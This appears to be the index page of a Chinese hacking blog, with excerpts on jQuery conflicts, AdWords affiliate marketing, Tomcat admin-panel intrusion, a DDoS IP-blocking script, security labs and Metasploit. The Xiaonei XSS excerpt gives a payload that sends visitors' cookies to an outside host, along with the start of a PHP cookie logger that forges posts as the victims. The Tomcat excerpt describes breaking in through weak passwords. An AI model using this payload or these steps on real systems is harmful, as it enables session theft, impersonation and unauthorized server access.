【黑客迷】
[Matrix]的技术博客：寻找幸福人生的0day-自由,免费,共享,突破

我们在用jquery的时候，经常会出现"对象不存在 或者对象不支持该属性"之类额错误提示，可是jquery的代码明明是正确的呀，那可能就是jquery和你网页上其他js代码出现冲突了（如flash调用代码，tab选项卡等等），这个时候可以按照下面的方面进行解决（通用的原理，推荐使用第二个方法）   Discuz和jQuery的冲突有两点，在/include/javascript/common.js文件的57~64之间有如下代码： Array.prototype.push = function(value) { this[this.length] = value; return this.length; } function $(id)...

今年3月份google的免费广告计划，在国内挑起了一段adwords的热潮，有幸搭上了顺风车也申请了一个，帐户是申请好了余额也有了，现在就是怎么用的问题了，当然一开始我不是打算用在淘客上的，因为我在做业务有实体的东西在销售，现在可以说实体的销售比淘客好做多了，利润更是大很多倍。 当然并不是说用adwords推广淘客就没得做，通过我一段时间的试验发现这里面还是有很多的门道的。 我是从2月份开始推广淘客的，基本上到现在广告也已经停止了，总结一下亏了一半进去。总共花了大概280元，到现在收回来的差不多就...

前提是能要登录后台 如果/manager/html后台找不到口令无法登陆， 尝试一下/admin后台， 如果/admin后台存在并且弱口令进去了。（从TOMCAT5（应该是5，具体版本忘了）开始默认/admin后台不存在 。） 在/admin后台里面可以看到manager后台的账号密码，拿到后直接登陆，或者自己手动添加manager用户组，并添加一个manager组的账号，就可以到/manager/html后台登陆了 /admin后台里面可以看到TOMCAT的所有配置信息， 里面有可能会找到数据库连接字符串。。 或者有可能会看到布置了多少个应用。 如果/manager/html后台...

最近服务器一直受到DDOS的攻击，目前只能通过封IP来源来暂时解决。IP不源变化多端，光靠手工来添加简直是恶梦，想了个方法，用SHELL来做。 比较简单，但很实用 ：） 1.编写脚本 mkdir /root/bin vi /root/bin/dropip.sh #!/bin/bash /bin/netstat -nagrep ESTABLISHEDawk ‘{print $5}’awk -F: ‘{print $1}’sortuniq -csort -rnhead -10grep -v -E ’192.168127.0′awk ‘{if ($2!=null && $1>4) {print $2}}’>/tmp/dropip for i in $(cat /tmp/d...

狼族论坛fly发的 校内网在发blog时对插入图片过滤不严格，存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发：   javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookietest.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下： <?php ob_start(); $url = 'blog.xiaonei.com'; $cookie=$_GET['cookie']; $cookie1=$cookie."\r\n\r\n"; fputs(fopen('a.txt','a+'),$cookie1...

www.milw0rm.com关闭一年多了吧...怀念ing...

GOOGLE攻防实验室地址：http://google-gruyere.appspot.com/ 感兴趣的可以去玩玩~ google攻防实验室是一个模拟真实入侵环境的web平台，里面的程序充满了各种各样的漏洞，通过利用这些漏洞，可以了解和学习各类黑客攻击手段，以便更好的检查我们的web程序和代码。 测试分为三种： 黑盒：测试用户看不到应用程序的源代码，完全通过对脚本进行猜测，从而设法利用安全漏洞获取0DAY。 白盒：通过查看程序的源代码寻找和发现安全漏洞。 灰盒：通过部分程序说明文档和源代码，猜测和寻找安全漏洞。 感兴趣的可以去试...

这些东西都出现好多年了 很多国内的安全公司也经常用他们做入侵检测，渗透测试 有空没事的话 多研究研究这两款软件 目前国内这方面的教程不是太多 一些所谓的黑客站除了抓鸡还是抓鸡 - - 简单的介绍下：metasploit和netifera都是开源的入侵平台 你如果会编程的话 可以编写相关的插件来增强他们的功能 已经有很多大牛为我们开路了 比如sql注入 sa权限和db-owner权限利用提权 本地远程溢出 扫描检测 arp sniff嗅探等等 都已经有相关的插件了 可以说 一软在手 黑遍天下无敌手 我想黑客迷改版后第一件事就是制作这几款...